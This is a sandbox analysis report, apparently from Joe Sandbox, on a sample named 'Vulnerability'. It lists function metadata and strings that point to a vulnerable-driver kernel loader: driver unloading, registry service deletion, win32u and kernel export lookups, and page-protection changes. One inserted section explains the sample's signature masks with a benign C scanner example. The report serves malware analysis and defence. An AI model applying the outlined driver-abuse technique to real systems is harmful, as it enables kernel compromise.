                                                                                          • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@?setstate@?$basic_ios@U?$char_traits@_V01@@W@std@@@std@@_invalid_parameter_noinfo_noreturnrand$?good@ios_base@std@@CloseHandleInit@?$basic_streambuf@V12@memset$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@??1?$basic_streambuf@??7ios_base@std@@?flush@?$basic_ostream@_?sputc@?$basic_streambuf@_?uncaught_exception@std@@?write@?$basic_ostream@D@std@@@1@_Osfx@?$basic_ostream@_PathTempV?$basic_streambuf@_wremovefclose
                                                                                          • String ID: [!] Error dumping shit inside the disk$[!] Failed to open file for writing$[+] Vul driver data destroyed before unlink$[<] Unloading vulnerable driver
                                                                                          • API String ID: 853663293-655004714
                                                                                          • Opcode ID: 4430f6868397d03d30fd6c8e74eb04efae2512e4c9569f4b52816f572ca90228
                                                                                          • Instruction ID: b0d6ea002379d19dd5ab9550b014d222fdb3c1f296a22cac00a1f5350663600a
                                                                                          • Opcode Fuzzy Hash: 4430f6868397d03d30fd6c8e74eb04efae2512e4c9569f4b52816f572ca90228
                                                                                          • Instruction Fuzzy Hash: 18A18462B18AC285EF04EF24E4552B8AB61EF847B8F90D132DA9D436E5DF3CD645C720
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32 ref: 00007FF7CC422DF5
                                                                                          • RtlInitUnicodeString.NTDLL ref: 00007FF7CC422E68
                                                                                          • RegOpenKeyW.ADVAPI32 ref: 00007FF7CC422EC6
                                                                                          • RegCloseKey.ADVAPI32 ref: 00007FF7CC422EDF
                                                                                          • GetProcAddress.KERNEL32 ref: 00007FF7CC422EEF
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A839
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A859
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A869
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A9E6
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A9ED
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A9FA
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7CC422F1A
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@J@Z.MSVCP140 ref: 00007FF7CC422F25
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC422F35
                                                                                          • RegDeleteTreeW.ADVAPI32 ref: 00007FF7CC422F96
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?getloc@ios_base@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7CC41A894
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A906
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?widen@?$ctype@_W@std@@QEBA_WD@Z.MSVCP140 ref: 00007FF7CC41A94E
                                                                                            • Part of subcall function 00007FF7CC41A7C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A95C
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC422F5C
                                                                                          • RegDeleteTreeW.ADVAPI32 ref: 00007FF7CC422F77
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC422FDD
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC423032
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: U?$char_traits@_V01@W@std@@@std@@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@??6?$basic_ostream@_?good@ios_base@std@@?sputc@?$basic_streambuf@_DeleteTreeV01@@_invalid_parameter_noinfo_noreturn$?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@?uncaught_exception@std@@?widen@?$ctype@_AddressCloseHandleInitModuleOpenOsfx@?$basic_ostream@_ProcStringUnicodeV12@V21@@Vios_base@1@Vlocale@2@W@std@@
                                                                                          • String ID: "$NtUnloadDriver$SYSTEM\CurrentControlSet\Services\$[+] NtUnloadDriver Status 0x$[-] Driver Unload Failed!!$\Registry\Machine\System\CurrentControlSet\Services\$ntdll.dll
                                                                                          • API String ID: 2676758807-3977549460
                                                                                          • Opcode ID: ec210fed9845f0e0354979e4a28a958b067c6b393723f70e910a0d52cca556ab
                                                                                          • Instruction ID: aceee35c9c6601aea4803d815b87e30c999803a4076ef80ea39ed915724d19d3
                                                                                          • Opcode Fuzzy Hash: ec210fed9845f0e0354979e4a28a958b067c6b393723f70e910a0d52cca556ab
                                                                                          • Instruction Fuzzy Hash: E8718E62B18A8295EB10EF65E4562BCA7B1FF44BBCF808631D95D43699DF3CD249C320
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC417080
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC4170C0
                                                                                          • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41C196
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41C1BE
                                                                                            • Part of subcall function 00007FF7CC424090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7CC416ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC4240A0
                                                                                            • Part of subcall function 00007FF7CC41C9F0: memmove.VCRUNTIME140 ref: 00007FF7CC41CA28
                                                                                            • Part of subcall function 00007FF7CC416440: memset.VCRUNTIME140 ref: 00007FF7CC416491
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC416510
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC4165B0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
Similarity
• API ID: V01@$??6?$basic_ostream@ControlD@std@@@std@@DeviceU?$char_traits@V01@@$AcquireExclusiveHandleLockModule_invalid_parameter_noinfo_noreturnmemmovememset
• String ID: 0$ExReleaseResourceLite$NtUserSetGestureConfig$[!] Failed to find ExReleaseResourceLite$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
• API String ID: 3251399726-2657333773
• Opcode ID: ca12fa7cb150998bb67f74a8a06d4b64a65faccdc0dafb2bab84ac4b28c18a35
• Instruction ID: 16e632fb47f9743257c11dbb20e3815dc89bfbd51e9b3484d68c5830aa63a767
• Opcode Fuzzy Hash: ca12fa7cb150998bb67f74a8a06d4b64a65faccdc0dafb2bab84ac4b28c18a35
• Instruction Fuzzy Hash: C6917072E18B8289EB10EF20E8502A9AB71FB897ACF949135D98D17755DF3CD245C320
APIs
• ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DE91
  • Part of subcall function 00007FF7CC41A3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A4B7
• ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DEB4
• ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DF77
• ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41DF9A
  • Part of subcall function 00007FF7CC417B00: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417B4D
  • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
  • Part of subcall function 00007FF7CC41A3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
  • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
  • Part of subcall function 00007FF7CC41A3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
  • Part of subcall function 00007FF7CC41A3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
  • Part of subcall function 00007FF7CC41A3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561
Strings
Memory Dump Source
• Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
• Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
Similarity
• API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@V01@@$U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputc@?$basic_streambuf@_?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
• String ID: PAGE$PAGELK$[!] Failed to find MmAllocateIndependentPagesEx$[!] Failed to find MmSetPageProtection$[-] Error allocating independent pages$[-] Failed to change page protections$x????xxxxxxxx????xxxxxxxxx????xxxxxxxx$xx????x???x?x????xxxxxxx????x
• API String ID: 3057132824-3125098887
• Opcode ID: fb905581844a62029b03e8b4b16e522c9344134a88a4b35d70f2d8d413b7dc7b
• Instruction ID: 75b06ec7e8c9cb1330d2cc2e609de2fac1efe4c8771edc8546afd882dab9772b
• Opcode Fuzzy Hash: fb905581844a62029b03e8b4b16e522c9344134a88a4b35d70f2d8d413b7dc7b
• Instruction Fuzzy Hash: 6B511B61A08BC291EA11AF15E4413A9EFA1EF847BCFD48035D98C47669EF7CE345C720
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
• Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
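The string table of the function above carries two masks ("x????xxxxxxxx????xxxxxxxxx????xxxxxxxx" and "xx????x???x?x????xxxxxxx????x") next to the section names PAGE and PAGELK and the messages "[!] Failed to find MmAllocateIndependentPagesEx" and "[!] Failed to find MmSetPageProtection". That combination is the usual footprint of a byte-signature scan: the loader walks named kernel sections and compares bytes only where the mask says 'x', treating '?' as a wildcard so that relocated displacements and immediates do not break the match, and reports the "[!] Failed to find" error when no section yields a hit. The following C program is an added example written for this page, not code recovered from the sample. Only the two masks and the two section names are taken from the report; the signature bytes, the 0x90 filler, the region_t descriptor and the demo_* helpers are constructed stand-ins, and the sample's real signature bytes are not on the page.

```c
/* Added example for this report, not code from the analysed sample: a
 * mask-driven byte-signature scanner ('x' = byte must match, '?' = wildcard).
 * Only the two masks and the section names PAGE/PAGELK come from the report. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct {            /* hypothetical stand-in for a PE section */
    const char    *name;
    const uint8_t *data;
    size_t         size;
} region_t;

/* Masks copied from the report. The signature bytes that go with them are
 * not on the page, so the fixture below uses constructed bytes instead. */
static const char MASK_A[] = "x????xxxxxxxx????xxxxxxxxx????xxxxxxxx";
static const char MASK_B[] = "xx????x???x?x????xxxxxxx????x";

/* Offset of the first match of (pattern, mask) in buf, or -1. Bytes are
 * compared only where mask[j] == 'x'; '?' slots match anything. */
long find_pattern(const uint8_t *buf, size_t len,
                  const uint8_t *pattern, const char *mask)
{
    size_t plen = strlen(mask);
    if (plen == 0 || len < plen)
        return -1;
    for (size_t i = 0; i + plen <= len; i++) {
        size_t j = 0;
        while (j < plen && (mask[j] != 'x' || buf[i + j] == pattern[j]))
            j++;
        if (j == plen)
            return (long)i;
    }
    return -1;
}

/* Scan only regions whose name is in `allowed`; on a hit store the region
 * index in *region_idx (if non-NULL) and return the offset, else -1. */
long find_in_regions(const region_t *regs, size_t nregs,
                     const char *const *allowed, size_t nallowed,
                     const uint8_t *pattern, const char *mask, size_t *region_idx)
{
    for (size_t r = 0; r < nregs; r++) {
        size_t a = 0;
        while (a < nallowed && strcmp(regs[r].name, allowed[a]) != 0)
            a++;
        if (a == nallowed)
            continue;                       /* not a section we may scan */
        long off = find_pattern(regs[r].data, regs[r].size, pattern, mask);
        if (off >= 0) {
            if (region_idx)
                *region_idx = r;
            return off;
        }
    }
    return -1;
}

/* Constructed fixture: 0x90 filler, signature bytes 7*j+3 planted at
 * plant_at, with every '?' slot set to 0xCC so only fixed bytes can match. */
static void build_fixture(uint8_t *buf, size_t len, uint8_t *pat,
                          const char *mask, size_t plant_at)
{
    memset(buf, 0x90, len);
    for (size_t j = 0; mask[j]; j++) {
        pat[j] = (uint8_t)(j * 7 + 3);
        buf[plant_at + j] = (mask[j] == 'x') ? pat[j] : 0xCC;
    }
}

/* Plant at offset 200, optionally disturb one byte, and report the hit:
 * tweak 0 = untouched (200), 1 = change a '?' slot (still 200),
 * 2 = change the first fixed byte (miss, -1). */
long demo_scan(const char *mask, int tweak)
{
    uint8_t buf[512], pat[64];
    build_fixture(buf, sizeof buf, pat, mask, 200);
    if (tweak == 1)
        buf[200 + (strchr(mask, '?') - mask)] = 0x22;
    else if (tweak == 2)
        buf[200] ^= 0xFF;
    return find_pattern(buf, sizeof buf, pat, mask);
}

/* Region filter: the bytes sit in both INIT and PAGE, only PAGE is scanned,
 * so the hit (offset 300) must be reported from region index 2. */
long demo_regions(size_t *region_idx)
{
    static uint8_t hit_buf[512], miss_buf[512];
    uint8_t pat[64];
    build_fixture(hit_buf, sizeof hit_buf, pat, MASK_B, 300);
    memset(miss_buf, 0x90, sizeof miss_buf);
    const region_t regs[] = { { "INIT",  hit_buf,  sizeof hit_buf  },
                              { ".text", miss_buf, sizeof miss_buf },
                              { "PAGE",  hit_buf,  sizeof hit_buf  } };
    const char *const allowed[] = { "PAGE", "PAGELK" };
    return find_in_regions(regs, 3, allowed, 2, pat, MASK_B, region_idx);
}

size_t demo_region_index(void) { size_t i = 99; demo_regions(&i); return i; }

int main(void)
{
    printf("MASK_A: hit %ld, wildcard changed %ld, fixed byte changed %ld\n",
           demo_scan(MASK_A, 0), demo_scan(MASK_A, 1), demo_scan(MASK_A, 2));
    printf("MASK_B: offset %ld in region %zu\n", demo_regions(NULL), demo_region_index());
    return 0;
}
```

The same scan is useful from the defender's side: run it over a dumped ntoskrnl image with the masks extracted from a sample, and a mask that matches at more than one offset, or outside the sections the sample names, is a sign the loader will resolve the wrong address on that build.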
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$EtwB$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-3808327900
                                                                                          • Opcode ID: df78221bdffc156db35b2127983c6b3e3aab9a69ab7ec58868172f2b5bd6dae9
                                                                                          • Instruction ID: 1fc71902600d2a47283d7b1b3507a243943ac516a741cd49bc943a51f587c7ae
                                                                                          • Opcode Fuzzy Hash: df78221bdffc156db35b2127983c6b3e3aab9a69ab7ec58868172f2b5bd6dae9
                                                                                          • Instruction Fuzzy Hash: CF516D72B18B8299EB10DF61E4506A9BBB5FB48798F948036DE8D13729DF3CD215C360
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: 5a0a87105d2346c2602f8f8006a18f2a622d0e1a3d3439b8cfb7f8a9fa029351
                                                                                          • Instruction ID: 9b016dfdbe3ad954f78e8cfd1a9db7c6e574d39322decd1eea9e756d8d4efe90
                                                                                          • Opcode Fuzzy Hash: 5a0a87105d2346c2602f8f8006a18f2a622d0e1a3d3439b8cfb7f8a9fa029351
                                                                                          • Instruction Fuzzy Hash: 26517F72B19B8599EB10EF60E4502ADBBB5BB4879CF948036DE8D13769DE3CD206C310
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: 6f9d5f0e2b821491aa30196e6b3b59d2bc79270dfdb0c5b52757afce229e07ed
                                                                                          • Instruction ID: a8077c4d77fbd70a15456a874a881d6c87f6f90d5e42b4c11da214908f08f173
                                                                                          • Opcode Fuzzy Hash: 6f9d5f0e2b821491aa30196e6b3b59d2bc79270dfdb0c5b52757afce229e07ed
                                                                                          • Instruction Fuzzy Hash: 6D518E32B19B8599EB10DF60E8402ADBBB5BB4879CF948036DE4D53759DE3CD216C320
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: 900657ba3c47b2c021ebf39136501028efa073b9903a7fe4cb49aaa2f12290b0
                                                                                          • Instruction ID: 974c1197f49280b6655b4f3f0af0ef76754538385da75a34fd7fb86fbe35a217
                                                                                          • Opcode Fuzzy Hash: 900657ba3c47b2c021ebf39136501028efa073b9903a7fe4cb49aaa2f12290b0
                                                                                          • Instruction Fuzzy Hash: 91514F76B18B8189EB10EF61E4502A9BBB5BB487ACF948136DE4D13755DF3CD21AC310
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: 7749d80f8f13a42049f5b9e6e472ecae39c28f806440561e49ed27ad90016e03
                                                                                          • Instruction ID: 9ae705be449bbb0ed694a880f77dfa7d6ca9f716ef824d70bf7bd459a285cbe2
                                                                                          • Opcode Fuzzy Hash: 7749d80f8f13a42049f5b9e6e472ecae39c28f806440561e49ed27ad90016e03
                                                                                          • Instruction Fuzzy Hash: 56516C32B18B8199EB10DF60E8502A9BBB5FB487ACF948036DE4D67759DE3CD616C310
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: 54a3dce36418586a9a6f77e2a7f9dca08d2ba8993b0022146bac7e6c093b9bd2
                                                                                          • Instruction ID: c34bec08ef1f3acb3db7812c51ffa3f1fbe7154595aaf9bcc6f0bb586e0d8fbf
                                                                                          • Opcode Fuzzy Hash: 54a3dce36418586a9a6f77e2a7f9dca08d2ba8993b0022146bac7e6c093b9bd2
                                                                                          • Instruction Fuzzy Hash: E6514D76B18B8189EB10EF61E4402ADBBB5BB4879CF948036DE4D13769DE3CD25AC350
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                                                          • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                                                          • API String ID: 2058718191-1835519504
                                                                                          • Opcode ID: 6674b9ca99e62bf10747288ca47ad4b80f2f326d1e31e8981f8dc3f76684e192
                                                                                          • Instruction ID: 85b2d1db55e34265e3c6c805c5e22863787b674dc8c1df67786eb360a3e486fc
                                                                                          • Opcode Fuzzy Hash: 6674b9ca99e62bf10747288ca47ad4b80f2f326d1e31e8981f8dc3f76684e192
                                                                                          • Instruction Fuzzy Hash: 9C514F36B18B8199E710EF60E4402A9BBB5BB4879CF948036DE4D13759EF3CD25AC750
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
